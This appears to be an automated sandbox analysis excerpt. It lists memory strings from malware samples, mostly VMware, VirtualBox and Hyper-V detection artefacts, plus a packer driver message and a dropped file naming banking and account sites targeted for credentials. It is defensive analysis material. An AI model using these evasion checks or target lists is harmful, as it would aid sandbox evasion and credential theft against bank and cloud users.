Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000E.00000002.3413173468.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: KJEBKJDA.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.8.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarew
Source: KJEBKJDA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEBKJDA.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: KJEBKJDA.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.000000000111C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: KJEBKJDA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, file.exe, 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.000000000111C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: KJEBKJDA.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP4g
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.000000000111C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: KJEBKJDA.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: KJEBKJDA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: BAFIEGIECG.exe, 0000000A.00000002.2677748862.00000000005EB000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000C.00000002.2708903828.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.2719044484.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.3413173468.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: KJEBKJDA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.8.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: KJEBKJDA.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEBKJDA.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2623849094.000000000166F000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000E.00000002.3408169203.000000000080B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000E.00000002.3408169203.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, 7873c16243.exe, 0000000F.00000002.2839628750.0000000001D09000.00000004.00000020.00020000.00000000.sdmp, 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KJEBKJDA.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.8.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: KJEBKJDA.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: KJEBKJDA.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: KJEBKJDA.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KJEBKJDA.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.8.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.8.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
